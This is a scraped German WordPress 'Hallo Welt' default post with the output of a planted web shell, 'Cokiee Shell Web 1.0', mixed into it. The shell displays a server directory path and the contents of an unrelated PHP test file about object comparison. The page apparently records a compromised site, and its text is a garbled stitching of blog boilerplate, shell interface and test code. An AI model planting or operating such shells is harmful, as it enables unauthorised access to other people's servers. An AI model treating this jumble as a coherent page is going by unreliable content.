Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/tests/lang/ |
Current File : //usr/local/src/php7/php-7.0.5/tests/lang/compare_objects_basic2.phpt |
--TEST-- Test object compare when object handler different --FILE-- <?php //Set the default time zone date_default_timezone_set("Europe/London"); echo "Simple test comparing two objects with different compare callback handler\n"; class X { } $obj1 = new X(); $obj2 = new DateTime(("2009-02-12 12:47:41 GMT")); var_dump($obj1 == $obj2); ?> ===DONE=== --EXPECTF-- Simple test comparing two objects with different compare callback handler bool(false) ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare